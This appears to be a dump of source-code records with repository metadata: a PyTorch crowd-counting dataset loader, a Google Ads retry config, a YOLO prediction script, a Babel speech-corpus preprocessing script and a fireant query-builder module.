return img_tensor,gt_dot_tensor,img_name
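A minimal wiring sketch (the directory paths below are hypothetical placeholders): batch_size=1 because uncropped images can differ in size between samples.
from torch.utils.data import DataLoader

dataset = CrowdDataset('data/images', 'data/gt_dots',   # hypothetical paths
                       phase='train', fixed_size=256)
loader = DataLoader(dataset, batch_size=1, shuffle=True)
for img_tensor, gt_dot_tensor, img_name in loader:
    print(img_name[0], img_tensor.shape, gt_dot_tensor.shape)
    break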
| 40.124138
| 160
| 0.554486
|
from torch.utils.data import Dataset
import os
import matplotlib.pyplot as plt
import numpy as np
import torch
import cv2
from torchvision import transforms
import random
from PIL import Image
import glob
class CrowdDataset(Dataset):
def __init__(self, img_root, gt_dot_root, split_txt_filepath=None, phase='train', aug=0, normalize=True, fixed_size=-1, max_side=-1):
self.img_root=img_root
self.gt_dot_root=gt_dot_root
self.phase=phase
self.split_txt_filepath = split_txt_filepath
if(split_txt_filepath is None):
self.img_names=[filename for filename in os.listdir(img_root) \
if os.path.isfile(os.path.join(img_root,filename))]
else:
img_list = np.loadtxt(split_txt_filepath, dtype=str)
self.img_names=[filename + '.jpg' for filename in img_list[:,0] \
if os.path.isfile(os.path.join(img_root,filename+ '.jpg'))]
self.n_samples=len(self.img_names)
self.aug=aug
        self.normalize = normalize
self.fixed_size = fixed_size
self.max_side = max_side
print('self.aug', self.aug)
print('self.fixed_size', self.fixed_size)
def __len__(self):
return self.n_samples
def __getitem__(self,index):
        assert index < len(self), 'index range error'
img_name=self.img_names[index]
img=plt.imread(os.path.join(self.img_root,img_name))/255
if len(img.shape)==2:
img=img[:,:,np.newaxis]
img=np.concatenate((img,img,img),2)
img=img[:,:,0:3]
        gtdot_path = os.path.join(self.gt_dot_root,img_name.replace('.jpg','_gt_dots.npy'))
        if(os.path.isfile(gtdot_path)):
            gt_dot=np.load(gtdot_path)
        else:
            gtdot_path = os.path.join(self.gt_dot_root,img_name.replace('.jpg','.npy'))
if(os.path.isfile(gtdot_path)):
gt_dot=np.load(gtdot_path)
else:
gt_dot=np.zeros((img.shape[0], img.shape[1]))
if random.randint(0,1)==1 and self.phase=='train':
img=img[:,::-1].copy()
gt_dot=gt_dot[:,::-1].copy()
if(self.phase=='train' and self.max_side > 0):
h = img.shape[0]
w = img.shape[1]
h2 = h
w2 = w
crop = False
if(h > self.max_side):
h2 = self.max_side
crop = True
if(w > self.max_side):
w2 = self.max_side
crop = True
if(crop):
y=0
x=0
if(not (h2 ==h)):
y = np.random.randint(0, high = h-h2)
if(not (w2 ==w)):
x = np.random.randint(0, high = w-w2)
img = img[y:y+h2, x:x+w2, :]
gt_dot = gt_dot[y:y+h2, x:x+w2]
        if ((self.aug > 0 and self.phase=='train') or (self.fixed_size > 0)):
            i = -1
            img_pil = Image.fromarray((img * 255).astype(np.uint8))
if(self.fixed_size < 0):
i, j, h, w = transforms.RandomCrop.get_params(img_pil, output_size=(img.shape[0]//4, img.shape[1]//4))
elif(self.fixed_size < img.shape[0] or self.fixed_size < img.shape[1]):
i, j, h, w = transforms.RandomCrop.get_params(img_pil, output_size=(min(self.fixed_size,img.shape[0]), min(self.fixed_size,img.shape[1])))
if(i >= 0):
img = img[i:i+h, j:j+w, :]
gt_dot = gt_dot[i:i+h, j:j+w]
max_scale = 16
if max_scale>1:
ds_rows=int(img.shape[0]//max_scale)*max_scale
ds_cols=int(img.shape[1]//max_scale)*max_scale
pad_y1 = 0
pad_y2 = 0
pad_x1 = 0
pad_x2 = 0
if(ds_rows < img.shape[0]):
pad_y1 = (max_scale - (img.shape[0] - ds_rows))//2
pad_y2 = (max_scale - (img.shape[0] - ds_rows)) - pad_y1
if(ds_cols < img.shape[1]):
pad_x1 = (max_scale - (img.shape[1] - ds_cols))//2
pad_x2 = (max_scale - (img.shape[1] - ds_cols)) - pad_x1
img = np.pad(img, ((pad_y1,pad_y2),(pad_x1,pad_x2),(0,0)), 'constant', constant_values=(1,) )
gt_dot = np.pad(gt_dot, ((pad_y1,pad_y2),(pad_x1,pad_x2)), 'constant', constant_values=(0,) )
gt_dot=gt_dot[np.newaxis,:,:]
gt_dot_tensor=torch.tensor(gt_dot,dtype=torch.float)
img=img.transpose((2,0,1))
img_tensor=torch.tensor(img,dtype=torch.float)
if(self.normalize):
img_tensor=transforms.functional.normalize(img_tensor,mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
return img_tensor,gt_dot_tensor,img_name
| true
| true
|
1c40d3c29f198e1d6558e79093b5ee23ceef0f5f
| 841
|
py
|
Python
|
google/ads/google_ads/v6/services/conversion_adjustment_upload_service_client_config.py
|
jphanwebstaurant/google-ads-python
|
600812b2afcc4d57f00b47dfe436620ce50bfe9b
|
[
"Apache-2.0"
] | 1
|
2021-04-09T04:28:47.000Z
|
2021-04-09T04:28:47.000Z
|
google/ads/google_ads/v6/services/conversion_adjustment_upload_service_client_config.py
|
jphanwebstaurant/google-ads-python
|
600812b2afcc4d57f00b47dfe436620ce50bfe9b
|
[
"Apache-2.0"
] | null | null | null |
google/ads/google_ads/v6/services/conversion_adjustment_upload_service_client_config.py
|
jphanwebstaurant/google-ads-python
|
600812b2afcc4d57f00b47dfe436620ce50bfe9b
|
[
"Apache-2.0"
] | null | null | null |
config = {
"interfaces": {
"google.ads.googleads.v6.services.ConversionAdjustmentUploadService": {
"retry_codes": {
"idempotent": [
"DEADLINE_EXCEEDED",
"UNAVAILABLE"
],
"non_idempotent": []
},
"retry_params": {
"default": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
}
},
"methods": {
"UploadConversionAdjustments": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default"
}
}
}
}
}
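A short sketch (assuming the usual GAPIC exponential-backoff reading of these parameters) of the retry delay sequence the `default` retry_params describe:
params = config["interfaces"][
    "google.ads.googleads.v6.services.ConversionAdjustmentUploadService"
]["retry_params"]["default"]
delay = params["initial_retry_delay_millis"]
while delay < params["max_retry_delay_millis"]:
    print(delay)                                   # 5000, 6500.0, 8450.0, ... up to 60000
    delay = min(delay * params["retry_delay_multiplier"],
                params["max_retry_delay_millis"])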
| 26.28125
| 75
| 0.546968
|
config = {
"interfaces": {
"google.ads.googleads.v6.services.ConversionAdjustmentUploadService": {
"retry_codes": {
"idempotent": [
"DEADLINE_EXCEEDED",
"UNAVAILABLE"
],
"non_idempotent": []
},
"retry_params": {
"default": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
}
},
"methods": {
"UploadConversionAdjustments": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default"
}
}
}
}
}
| true
| true
|
1c40d4439683f1c1b8e7339dffa661baea4ea06b
| 1,182
|
py
|
Python
|
predict.py
|
guoshuhong/yolo4_SVHN
|
fb91d5c21a3ff2b6f8e977e7de5b91b1ecf3394e
|
[
"MIT"
] | null | null | null |
predict.py
|
guoshuhong/yolo4_SVHN
|
fb91d5c21a3ff2b6f8e977e7de5b91b1ecf3394e
|
[
"MIT"
] | null | null | null |
predict.py
|
guoshuhong/yolo4_SVHN
|
fb91d5c21a3ff2b6f8e977e7de5b91b1ecf3394e
|
[
"MIT"
] | null | null | null |
#-------------------------------------#
#   Predict a single image
#-------------------------------------#
from yolo import YOLO
from PIL import Image
import os
import time
import pandas as pd
import numpy as np
yolo = YOLO()
while True:
filelist = os.listdir()
img = input('Input image filename:')
try:
image = Image.open(img)
except:
print('Open Error! Try again!')
continue
else:
r_image = yolo.detect_image(image)
r_image.show()
# TIANCHI
# filelist = os.listdir("mchar_test_a")
# cnt = -1
# test_label_pred = ["123"]*40000
# for img in filelist:
# try:
# image = Image.open("mchar_test_a/" + img)
# except:
# print('Open Error! Try again!')
# continue
# else:
# cnt += 1
# print(cnt)
# # if cnt == 10 :
# # break
# # r_image = yolo.detect_image(image ,test_label_pred, cnt)
# test_label_pred = yolo.detect_image(image ,test_label_pred, cnt)
# # time.sleep(2)
# # r_image.show()
df_submit = pd.read_csv('mchar_sample_submit_A.csv')
df_submit['file_code'] = test_label_pred
df_submit.to_csv('submit9-12.csv', index=None)
| 25.148936
| 74
| 0.559222
|
from yolo import YOLO
from PIL import Image
import os
import time
import pandas as pd
import numpy as np
yolo = YOLO()
while True:
filelist = os.listdir()
img = input('Input image filename:')
try:
image = Image.open(img)
except:
print('Open Error! Try again!')
continue
else:
r_image = yolo.detect_image(image)
r_image.show()
df_submit = pd.read_csv('mchar_sample_submit_A.csv')
df_submit['file_code'] = test_label_pred
df_submit.to_csv('submit9-12.csv', index=None)
| true
| true
|
1c40d491ec9cacd474a81b295016a4c0fc79a49e
| 6,447
|
py
|
Python
|
data/babel.py
|
neural-polysynthetic-language-modelling/deepspeech.pytorch
|
7883e5be5abeacdd52aa170f85d3060ed3b11d00
|
[
"MIT"
] | null | null | null |
data/babel.py
|
neural-polysynthetic-language-modelling/deepspeech.pytorch
|
7883e5be5abeacdd52aa170f85d3060ed3b11d00
|
[
"MIT"
] | null | null | null |
data/babel.py
|
neural-polysynthetic-language-modelling/deepspeech.pytorch
|
7883e5be5abeacdd52aa170f85d3060ed3b11d00
|
[
"MIT"
] | null | null | null |
import os
import wget
import tarfile
import argparse
import csv
from multiprocessing.pool import ThreadPool
import subprocess
from utils import create_manifest
import re
from sphfile import SPHFile
parser = argparse.ArgumentParser(description='Processes downloaded IARPA babel corpus')
parser.add_argument("--target-dir", default='CommonVoice_dataset/', type=str, help="Directory to store the dataset.")
parser.add_argument("--data-dir", type=str, help="Path to the BABEL directory file ")
parser.add_argument('--sample-rate', default=16000, type=int, help='Sample rate')
parser.add_argument('--min-duration', default=1, type=int,
help='Prunes training samples shorter than the min duration (given in seconds, default 1)')
parser.add_argument('--max-duration', default=15, type=int,
help='Prunes training samples longer than the max duration (given in seconds, default 15)')
args = parser.parse_args()
def read_transcription_file(file_path, audio_file_path):
"""Read transcription files from the IARPA babel format.
Transcription files consist of the following format
[timestamp]
transcription
[timestamp]
transcription
[timestamp]
Args:
file_path: str, path to the transcription file to read.
audio_file_path: str, path to the sph file that corresponds to
the given transcription file.
Returns:
an array of dicts where the following keys are used:
'start_time', 'end_time', 'transcription', 'audio_file'
"""
with open(file_path) as in_file:
last_timestamp = 0
res = []
transcription = ""
for line in in_file:
            time_stamp_match = re.match(r"\[([0-9]+\.[0-9]+)\]", line)
#if this regex matched then the line is a timestamp
if time_stamp_match:
timestamp = float(time_stamp_match.group(1))
if transcription and transcription.strip() not in ['(())', "<no-speech>"]:
single_instance = {"start_time": last_timestamp,
"end_time": timestamp,
"transcription": transcription,
"audio_file" : audio_file_path}
res.append(single_instance)
last_timestamp = timestamp
else:
last_timestamp = timestamp # this handles silence at beginning
else:
transcription = line.strip()
return res
def convert_to_wav(txt_file, sph_path, target_dir):
""" Read *.csv file description, convert mp3 to wav, process text.
Save results to target_dir.
Args:
txt_file: str, path to *.txt file with data description,
usually contained in the transcription folder
target_dir: str, path to dir to save results; wav/ and txt/ dirs will be created
"""
wav_dir = os.path.join(target_dir, 'wav/')
txt_dir = os.path.join(target_dir, 'txt/')
os.makedirs(wav_dir, exist_ok=True)
os.makedirs(txt_dir, exist_ok=True)
path_to_data = os.path.dirname(txt_file)
def process(x):
file_path = x["audio_file"]
text = x["transcription"]
start_time = x["start_time"]
duration = x["end_time"] - start_time
file_name = os.path.splitext(os.path.basename(file_path))[0]
file_name = str(start_time) + "_" + str(duration) + file_name
text = text.strip().upper()
with open(os.path.join(txt_dir, file_name + '.txt'), 'w') as f:
f.write(text)
cmd = "sox -v 0.6 -t wav {} -r {} -b 16 -c 1 -t wav {} trim {} {}".format(
os.path.join(path_to_data, file_path),
args.sample_rate,
os.path.join(wav_dir, file_name + ".wav"),
start_time,
duration)
subprocess.call([cmd], shell=True)
print('Converting wav to wav for {}.'.format(txt_file))
# generate processed data
data = read_transcription_file(txt_file, sph_path)
with ThreadPool(10) as pool:
pool.map(process, data)
def main():
target_dir = args.target_dir
os.makedirs(target_dir, exist_ok=True)
target_unpacked_dir = os.path.join(target_dir, "CV_unpacked")
os.makedirs(target_unpacked_dir, exist_ok=True)
if args.data_dir and os.path.exists(args.data_dir):
print('Find existing file {}'.format(args.data_dir))
else:
raise RuntimeError("Could not find downloaded IARPA babel corpus, please download the relevant corpus from LDC")
if os.path.isdir(args.data_dir):
print("Identified unpacked IARPA dataset")
unpacked_location = args.data_dir
else:
print("Unpacking corpus to {} ...".format(target_unpacked_dir))
        tar = tarfile.open(args.data_dir)  # unpack the archive pointed at by --data-dir
tar.extractall(target_unpacked_dir)
tar.close()
unpacked_location = target_unpacked_dir
path_flattened = re.sub(r"[\/]", "_", os.path.splitext(args.data_dir)[0])
os.makedirs(os.path.join(target_dir, path_flattened), exist_ok=True)
roots = {}
# collect all the filepaths
for root, dirs, files in os.walk(unpacked_location):
roots[root] = files
audio_trans_pairs = [] # this is a list of tuples
for root in roots:
# find all the audio directories
if re.search(r"/audio", root):
transcription_root = re.sub(r"/audio", "/transcription", root)
print(transcription_root)
for fp in roots[root]:
txt_fp = re.sub(r"\.wav", ".txt", fp)
if os.path.exists(os.path.join(transcription_root, txt_fp)):
pair_tuple = (os.path.join(transcription_root, txt_fp),
os.path.join(root, fp))
audio_trans_pairs.append(pair_tuple)
for txt_path, audio_path in audio_trans_pairs:
convert_to_wav(txt_path,
audio_path,
os.path.join(target_dir,path_flattened))
# make a separate manifest for each
print('Creating manifests...')
create_manifest(os.path.join(target_dir,path_flattened),
path_flattened + '_manifest.csv',
args.min_duration,
args.max_duration)
if __name__ == "__main__":
main()
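A small round-trip sketch (temporary file with made-up content) of the timestamp/transcription layout that read_transcription_file expects:
sample = "[0.0]\nhello world\n[1.5]\n<no-speech>\n[2.0]\n"
with open('/tmp/demo.txt', 'w') as f:              # hypothetical scratch file
    f.write(sample)
print(read_transcription_file('/tmp/demo.txt', 'demo.sph'))
# -> [{'start_time': 0, 'end_time': 1.5, 'transcription': 'hello world',
#      'audio_file': 'demo.sph'}]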
| 40.54717
| 120
| 0.614549
|
import os
import wget
import tarfile
import argparse
import csv
from multiprocessing.pool import ThreadPool
import subprocess
from utils import create_manifest
import re
from sphfile import SPHFile
parser = argparse.ArgumentParser(description='Processes downloaded IARPA babel corpus')
parser.add_argument("--target-dir", default='CommonVoice_dataset/', type=str, help="Directory to store the dataset.")
parser.add_argument("--data-dir", type=str, help="Path to the BABEL directory file ")
parser.add_argument('--sample-rate', default=16000, type=int, help='Sample rate')
parser.add_argument('--min-duration', default=1, type=int,
help='Prunes training samples shorter than the min duration (given in seconds, default 1)')
parser.add_argument('--max-duration', default=15, type=int,
help='Prunes training samples longer than the max duration (given in seconds, default 15)')
args = parser.parse_args()
def read_transcription_file(file_path, audio_file_path):
with open(file_path) as in_file:
last_timestamp = 0
res = []
transcription = ""
for line in in_file:
            time_stamp_match = re.match(r"\[([0-9]+\.[0-9]+)\]", line)
if time_stamp_match:
timestamp = float(time_stamp_match.group(1))
if transcription and transcription.strip() not in ['(())', "<no-speech>"]:
single_instance = {"start_time": last_timestamp,
"end_time": timestamp,
"transcription": transcription,
"audio_file" : audio_file_path}
res.append(single_instance)
last_timestamp = timestamp
else:
last_timestamp = timestamp
else:
transcription = line.strip()
return res
def convert_to_wav(txt_file, sph_path, target_dir):
wav_dir = os.path.join(target_dir, 'wav/')
txt_dir = os.path.join(target_dir, 'txt/')
os.makedirs(wav_dir, exist_ok=True)
os.makedirs(txt_dir, exist_ok=True)
path_to_data = os.path.dirname(txt_file)
def process(x):
file_path = x["audio_file"]
text = x["transcription"]
start_time = x["start_time"]
duration = x["end_time"] - start_time
file_name = os.path.splitext(os.path.basename(file_path))[0]
file_name = str(start_time) + "_" + str(duration) + file_name
text = text.strip().upper()
with open(os.path.join(txt_dir, file_name + '.txt'), 'w') as f:
f.write(text)
cmd = "sox -v 0.6 -t wav {} -r {} -b 16 -c 1 -t wav {} trim {} {}".format(
os.path.join(path_to_data, file_path),
args.sample_rate,
os.path.join(wav_dir, file_name + ".wav"),
start_time,
duration)
subprocess.call([cmd], shell=True)
print('Converting wav to wav for {}.'.format(txt_file))
data = read_transcription_file(txt_file, sph_path)
with ThreadPool(10) as pool:
pool.map(process, data)
def main():
target_dir = args.target_dir
os.makedirs(target_dir, exist_ok=True)
target_unpacked_dir = os.path.join(target_dir, "CV_unpacked")
os.makedirs(target_unpacked_dir, exist_ok=True)
if args.data_dir and os.path.exists(args.data_dir):
print('Find existing file {}'.format(args.data_dir))
else:
raise RuntimeError("Could not find downloaded IARPA babel corpus, please download the relevant corpus from LDC")
if os.path.isdir(args.data_dir):
print("Identified unpacked IARPA dataset")
unpacked_location = args.data_dir
else:
print("Unpacking corpus to {} ...".format(target_unpacked_dir))
        tar = tarfile.open(args.data_dir)
tar.extractall(target_unpacked_dir)
tar.close()
unpacked_location = target_unpacked_dir
path_flattened = re.sub(r"[\/]", "_", os.path.splitext(args.data_dir)[0])
os.makedirs(os.path.join(target_dir, path_flattened), exist_ok=True)
roots = {}
for root, dirs, files in os.walk(unpacked_location):
roots[root] = files
audio_trans_pairs = []
for root in roots:
if re.search(r"/audio", root):
transcription_root = re.sub(r"/audio", "/transcription", root)
print(transcription_root)
for fp in roots[root]:
txt_fp = re.sub(r"\.wav", ".txt", fp)
if os.path.exists(os.path.join(transcription_root, txt_fp)):
pair_tuple = (os.path.join(transcription_root, txt_fp),
os.path.join(root, fp))
audio_trans_pairs.append(pair_tuple)
for txt_path, audio_path in audio_trans_pairs:
convert_to_wav(txt_path,
audio_path,
os.path.join(target_dir,path_flattened))
print('Creating manifests...')
create_manifest(os.path.join(target_dir,path_flattened),
path_flattened + '_manifest.csv',
args.min_duration,
args.max_duration)
if __name__ == "__main__":
main()
| true
| true
|
1c40d71a856cf0d96408fe13f437a7c391a85183
| 10,511
|
py
|
Python
|
fireant/queries/builder/query_builder.py
|
mikeengland/fireant
|
63c12728c11f1fb252265459f8b8f384d20414b9
|
[
"Apache-2.0"
] | 122
|
2016-08-05T13:34:52.000Z
|
2022-03-15T13:21:13.000Z
|
fireant/queries/builder/query_builder.py
|
mikeengland/fireant
|
63c12728c11f1fb252265459f8b8f384d20414b9
|
[
"Apache-2.0"
] | 321
|
2016-08-10T08:48:15.000Z
|
2021-07-28T13:08:18.000Z
|
fireant/queries/builder/query_builder.py
|
mikeengland/fireant
|
63c12728c11f1fb252265459f8b8f384d20414b9
|
[
"Apache-2.0"
] | 27
|
2016-08-10T08:11:08.000Z
|
2021-08-23T08:14:37.000Z
|
from typing import TYPE_CHECKING, Union
from pypika import Order
from fireant.dataset.fields import Field
from fireant.exceptions import DataSetException
from fireant.utils import (
deepcopy,
immutable,
)
from ..execution import fetch_data
from ..finders import find_field_in_modified_field
from ..sets import (
apply_set_dimensions,
omit_set_filters,
)
if TYPE_CHECKING:
from fireant.dataset import DataSet
class QueryException(DataSetException):
pass
def add_hints(queries, hint=None):
return [query.hint(hint) if hint is not None and hasattr(query.__class__, "hint") else query for query in queries]
def get_column_names(database, table):
column_definitions = database.get_column_definitions(table._schema._name, table._table_name)
return {column_definition[0] for column_definition in column_definitions}
def validate_fields(fields, dataset):
fields = [find_field_in_modified_field(field) for field in fields]
invalid = [field.alias for field in fields if field not in dataset.fields]
if not invalid:
return
raise DataSetException(
"Only fields from dataset can be used in a dataset query. Found invalid fields: {}.".format(", ".join(invalid))
)
def _strip_modifiers(fields):
for field in fields:
node = field
while hasattr(node, "dimension"):
node = node.dimension
yield node
class QueryBuilder(object):
"""
This is the base class for building dataset queries. This class provides an interface for building dataset queries
via a set of functions which can be chained together.
"""
def __init__(self, dataset: 'DataSet'):
"""
:param dataset: DataSet to build the query for
"""
self.dataset = dataset
self.table = dataset.table
self._dimensions = []
self._filters = []
self._orders = None
self._client_limit = None
self._client_offset = None
self._query_limit = None
self._query_offset = None
# noinspection PyDefaultArgument
def __deepcopy__(self, memodict={}):
fields = [d for d in self._dimensions]
if self._orders is not None:
fields += [field for (field, _) in self._orders]
for field in fields:
field = find_field_in_modified_field(field)
memodict[id(field)] = field
return deepcopy(self, memodict)
@immutable
def dimension(self, *dimensions):
"""
Add one or more dimensions when building a dataset query.
:param dimensions:
Dimensions to add to the query
:return:
A copy of the query with the dimensions added.
"""
validate_fields(dimensions, self.dataset)
aliases = {dimension.alias for dimension in self._dimensions}
self._dimensions += [dimension for dimension in dimensions if dimension.alias not in aliases]
@immutable
def filter(self, *filters):
"""
Add one or more filters when building a dataset query.
:param filters:
Filters to add to the query
:return:
A copy of the query with the filters added.
"""
validate_fields([fltr.field for fltr in filters], self.dataset)
self._filters += [f for f in filters]
@immutable
def orderby(self, field: Field, orientation: Order = None):
"""
:param field:
The element to order by, either a metric or dimension.
:param orientation:
The directionality to order by, either ascending or descending.
:return:
A copy of the query with the order by added.
"""
validate_fields([field], self.dataset)
if self._orders is None:
self._orders = []
if field is not None:
self._orders += [(field, orientation)]
@immutable
def limit_query(self, limit):
"""
Sets the limit of the query.
:param limit:
A limit on the number of database rows returned.
:return:
A copy of the query with the query limit set.
"""
self._query_limit = limit
@immutable
def offset_query(self, offset):
"""
Sets the offset of the query.
:param offset:
            An offset on the number of database rows returned.
:return:
A copy of the query with the query offset set.
"""
self._query_offset = offset
@immutable
def limit_client(self, limit):
"""
Sets the limit to be used when paginating the Pandas Dataframe after the results
have been returned
:param limit:
A limit on the number of dataframe rows returned.
:return:
A copy of the query with the dataframe limit set.
"""
self._client_limit = limit
@immutable
def offset_client(self, offset):
"""
Sets the offset to be used when paginating the Pandas Dataframe after the results
have been returned
:param offset:
A offset on the number of dataframe rows returned
:return:
A copy of the query with the dataframe offset set.
"""
self._client_offset = offset
@property
def dimensions(self):
"""
Returns a list of Field instances, that might include newly created set dimensions.
Set dimensions are generated at this level because the `ResultSet` filter modifier can artificially
create dimensions, which widgets need to be aware in order to properly render the data. Moving this to
        `make_slicer_query_with_totals_and_references` function is not possible, even if we defaulted to using
        the same alias as the referenced dimension/metric, given that would cause alias clashes. Dimensions can
be mostly replaced, but that's not the case for metrics.
:return: A list of Field instances.
"""
return apply_set_dimensions(self._dimensions, self._filters, self.dataset)
@property
def filters(self):
"""
Returns a list of Filter instances, that might omit filters wrapped with `ResultSet` filter modifier.
:return: A list of Filter instances.
"""
return omit_set_filters(self._filters)
@property
def orders(self):
"""
Return orders.
:return: None or a list of tuples shaped as Field instance and ordering.
"""
return self._orders or self.default_orders
@property
def default_orders(self):
"""
Return orders based on the provided dimensions.
:return: A list of tuples shaped as Field instance and ordering.
"""
dimension_orders = []
for dimension in self.dimensions:
if not dimension.is_aggregate:
dimension_orders.append((dimension, None))
return dimension_orders
@property
def sql(self):
"""
Serialize this query builder object to a set of Pypika/SQL queries.
This is the base implementation shared by two implementations: the query to fetch data for a dataset request and
the query to fetch choices for dimensions.
This function only handles dimensions (select+group by) and filtering (where/having), which is everything needed
for the query to fetch choices for dimensions.
The dataset query extends this with metrics, references, and totals.
"""
raise NotImplementedError()
def fetch(self, hint=None):
"""
Fetches the data for this query instance and returns it in an instance of `pd.DataFrame`
:param hint:
For database vendors that support it, add a query hint to collect analytics on the queries triggered by
fireant.
"""
queries = add_hints(self.sql, hint)
max_rows_returned, data = fetch_data(self.dataset.database, queries, self.dimensions)
return self._transform_for_return(data, max_rows_returned=max_rows_returned)
def _apply_pagination(self, query):
# Some platforms require an order by when pagination is used. Therefore, if there is no ordering set,
# we just default to the first column.
if not self.orders:
query = query.orderby(1)
query = query.limit(min(self._query_limit or float('inf'), self.dataset.database.max_result_set_size))
return query.offset(self._query_offset)
def _transform_for_return(self, widget_data, **metadata) -> Union[dict, list]:
return (
dict(data=widget_data, metadata=dict(**metadata))
if self.dataset.return_additional_metadata
else widget_data
)
class ReferenceQueryBuilderMixin:
"""
This is a mixin class for building dataset queries that allow references. This class provides an interface for
building dataset queries via a set of functions which can be chained together.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._references = []
@immutable
def reference(self, *references):
"""
Add one or more references for a dimension when building a dataset query.
:param references:
References to add to the query
:return:
A copy of the query with the references added.
"""
validate_fields([reference.field for reference in references], self.dataset)
self._references += references
class WidgetQueryBuilderMixin:
"""
This is a mixin class for building dataset queries that allow widgets. This class provides an interface for
building dataset queries via a set of functions which can be chained together.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._widgets = []
def _validate(self):
for widget in self._widgets:
if hasattr(widget, "validate"):
widget.validate(self._dimensions)
@immutable
def widget(self, *widgets):
"""
Add one or more widgets when building a dataset query.
:param widgets:
Widgets to add to the query
:return:
A copy of the query with the widgets added.
"""
validate_fields([field for widget in widgets for field in widget.metrics], self.dataset)
self._widgets += widgets
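A hedged sketch of the chained builder style described above; `my_dataset` and its fields are hypothetical stand-ins, and a concrete request would typically also chain `.widget(...)` from the mixin above.
query = (
    my_dataset.query                                 # assumed builder entry point
    .dimension(my_dataset.fields.timestamp)
    .filter(my_dataset.fields.customer_id == 42)     # field comparisons yield filters
    .orderby(my_dataset.fields.timestamp, Order.desc)
    .limit_client(100)
)
df = query.fetch()                                   # runs the query, returns the data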
| 32.045732
| 120
| 0.643802
|
from typing import TYPE_CHECKING, Union
from pypika import Order
from fireant.dataset.fields import Field
from fireant.exceptions import DataSetException
from fireant.utils import (
deepcopy,
immutable,
)
from ..execution import fetch_data
from ..finders import find_field_in_modified_field
from ..sets import (
apply_set_dimensions,
omit_set_filters,
)
if TYPE_CHECKING:
from fireant.dataset import DataSet
class QueryException(DataSetException):
pass
def add_hints(queries, hint=None):
return [query.hint(hint) if hint is not None and hasattr(query.__class__, "hint") else query for query in queries]
def get_column_names(database, table):
column_definitions = database.get_column_definitions(table._schema._name, table._table_name)
return {column_definition[0] for column_definition in column_definitions}
def validate_fields(fields, dataset):
fields = [find_field_in_modified_field(field) for field in fields]
invalid = [field.alias for field in fields if field not in dataset.fields]
if not invalid:
return
raise DataSetException(
"Only fields from dataset can be used in a dataset query. Found invalid fields: {}.".format(", ".join(invalid))
)
def _strip_modifiers(fields):
for field in fields:
node = field
while hasattr(node, "dimension"):
node = node.dimension
yield node
class QueryBuilder(object):
def __init__(self, dataset: 'DataSet'):
self.dataset = dataset
self.table = dataset.table
self._dimensions = []
self._filters = []
self._orders = None
self._client_limit = None
self._client_offset = None
self._query_limit = None
self._query_offset = None
def __deepcopy__(self, memodict={}):
fields = [d for d in self._dimensions]
if self._orders is not None:
fields += [field for (field, _) in self._orders]
for field in fields:
field = find_field_in_modified_field(field)
memodict[id(field)] = field
return deepcopy(self, memodict)
@immutable
def dimension(self, *dimensions):
validate_fields(dimensions, self.dataset)
aliases = {dimension.alias for dimension in self._dimensions}
self._dimensions += [dimension for dimension in dimensions if dimension.alias not in aliases]
@immutable
def filter(self, *filters):
validate_fields([fltr.field for fltr in filters], self.dataset)
self._filters += [f for f in filters]
@immutable
def orderby(self, field: Field, orientation: Order = None):
validate_fields([field], self.dataset)
if self._orders is None:
self._orders = []
if field is not None:
self._orders += [(field, orientation)]
@immutable
def limit_query(self, limit):
self._query_limit = limit
@immutable
def offset_query(self, offset):
self._query_offset = offset
@immutable
def limit_client(self, limit):
self._client_limit = limit
@immutable
def offset_client(self, offset):
self._client_offset = offset
@property
def dimensions(self):
return apply_set_dimensions(self._dimensions, self._filters, self.dataset)
@property
def filters(self):
return omit_set_filters(self._filters)
@property
def orders(self):
return self._orders or self.default_orders
@property
def default_orders(self):
dimension_orders = []
for dimension in self.dimensions:
if not dimension.is_aggregate:
dimension_orders.append((dimension, None))
return dimension_orders
@property
def sql(self):
raise NotImplementedError()
def fetch(self, hint=None):
queries = add_hints(self.sql, hint)
max_rows_returned, data = fetch_data(self.dataset.database, queries, self.dimensions)
return self._transform_for_return(data, max_rows_returned=max_rows_returned)
def _apply_pagination(self, query):
if not self.orders:
query = query.orderby(1)
query = query.limit(min(self._query_limit or float('inf'), self.dataset.database.max_result_set_size))
return query.offset(self._query_offset)
def _transform_for_return(self, widget_data, **metadata) -> Union[dict, list]:
return (
dict(data=widget_data, metadata=dict(**metadata))
if self.dataset.return_additional_metadata
else widget_data
)
class ReferenceQueryBuilderMixin:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._references = []
@immutable
def reference(self, *references):
validate_fields([reference.field for reference in references], self.dataset)
self._references += references
class WidgetQueryBuilderMixin:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._widgets = []
def _validate(self):
for widget in self._widgets:
if hasattr(widget, "validate"):
widget.validate(self._dimensions)
@immutable
def widget(self, *widgets):
validate_fields([field for widget in widgets for field in widget.metrics], self.dataset)
self._widgets += widgets
| true
| true
|
1c40d7494928228b274188b3277cc77f6aa633df
| 5,270
|
py
|
Python
|
src/compas_rv2/singular/algorithms/propagation.py
|
selinabitting/compas-RV2
|
0884cc00d09c8f4a75eb2b97614105e4c8bfd818
|
[
"MIT"
] | 4
|
2022-01-17T19:17:22.000Z
|
2022-01-21T18:06:02.000Z
|
src/compas_rv2/singular/algorithms/propagation.py
|
selinabitting/compas-RV2
|
0884cc00d09c8f4a75eb2b97614105e4c8bfd818
|
[
"MIT"
] | null | null | null |
src/compas_rv2/singular/algorithms/propagation.py
|
selinabitting/compas-RV2
|
0884cc00d09c8f4a75eb2b97614105e4c8bfd818
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
